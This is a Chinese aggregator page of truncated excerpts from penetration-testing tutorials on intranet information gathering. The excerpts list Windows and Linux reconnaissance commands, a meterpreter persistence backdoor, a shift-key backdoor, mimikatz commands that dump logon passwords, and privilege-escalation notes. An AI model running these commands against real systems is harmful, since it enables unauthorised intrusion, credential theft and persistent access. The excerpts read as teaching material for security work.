内网渗透之信息收集-windows】的更多相关文章

windows 用户相关 query user #查看当前在线的用户 whoami #查看当前用户 net user #查看当前系统全部用户 net1 user #查看当前系统全部用户(高权限命令) net user /domain #查看当前域全部用户 net user administrator #查看admin用户详细信息 net localgroup #查看本地用户组 net localgroup administrators #查看组中成员描述 网络相关 ipconfig /all #…
用户相关 query user #查看当前在线的用户 whoami #查看当前用户 net user #查看当前系统全部用户 net1 user #查看当前系统全部用户(高权限命令) net user /domain #查看当前域全部用户 net user administrator #查看admin用户详细信息 net localgroup #查看本地用户组 net localgroup administrators #查看组中成员描述 网络相关 ipconfig /all #查看全部ip信息…
一.基础信息收集 1.查看系统类型 cat /etc/issue cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release 2.内核版本 cat /proc version uname -a uname -mrs rpm -q kernel dmesg |grep Linux ls /root |grep vmlinuz 3.进程与服务 ps aux ps -ef top cat /etc/service 4.安装的应用程序…
linux     系统信息         grep MemTotal /proc/meminfo #查看系统内存总量         cat /etc/issue #查看系统名称         cat /etc/lsb-release #查看系统名称.版本号         uname -a #查看内核信息         ls /root | grep vmlinuz #查看内核信息     系统信息         grep MemTotal /proc/meminfo #查看系统内存…
linux 系统信息 grep MenTotal /proc/meminfo #查看系统内存总量 cat /etc/issue #查看系统名称 cat /etc/lsb-release #查看系统名称.版本号 uname -a #查看内核信息 ls /root | grep vmlinuz #查看内核信息 用户信息 whoami #我现在登录的用户 id #当前用户id id test #查看test用户信息 w #查看当前系统活动用户 lastlog #查看用户登录日志 cat /etc/pa…
linux信息搜集 目录 1. linux信息搜集 2. nmap漏洞复现 3. msf linux模块反弹shell 1. linux信息搜集 id 查看当前用户的权限和所在的管理组 python -c "import pty;pty.spawn('/bin/bash');" 会话提升 uname -a 查看linux版本内核信息 cat /etc/*release 查看linux发行信息 dpkg -l 查看安装的包 crontab -l 是否有计划任务(这边显示没有计划任务) /…
后门植入 目录 1. 持续化后门 2. 手动上传木马并加入注册表中 3. 上传nc 4. 开3389-->shift后门-->远程登入 5. at调用 1. 持续化后门 在提权后的meterpreter下执行 run persistence -i 5 -U -X -A 自动匹配监听器连接用户 -S 系统开启的时候作为服务自动运行,反弹shell -U 在用户登入的时候反弹shell -X 系统开启的时候返回shell -i 间隔几秒中反弹 -p 指定监听的端口 -r 设定回连的ip win7重…
使用mimikatz提取windows密码 以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和"纯文本"密码将不在内存中生成,早期版本的Windows 7/8/2008 R2/2012 需要打 kb2871997…
文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域渗透中,横向移动最重要是对windows认证协议的理解 首先介绍一下windows密码的Hash: 早期SMB协议在网络上传输明文口令,后来出现"LAN Manager Challenge/Response"验证机制,简称LM,由于容易被破解,微软提出了windows NT挑战/响应机制,…
MS提权 MS16- MS16- 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫描 跳板机环境分析 1.具备公网IP,所有端口可直接连接,且可访问外网 - 即可使用正向连接,又可以使用反向连接 2.跳板机受到WAF保护或有NAT限制,只有Web服务端口可以连接,跳板机可访问外网 - 使用反向连接 3.跳板机通过反向代理/端口映射提供Web服务,仅可访问80/443端口,本身无外…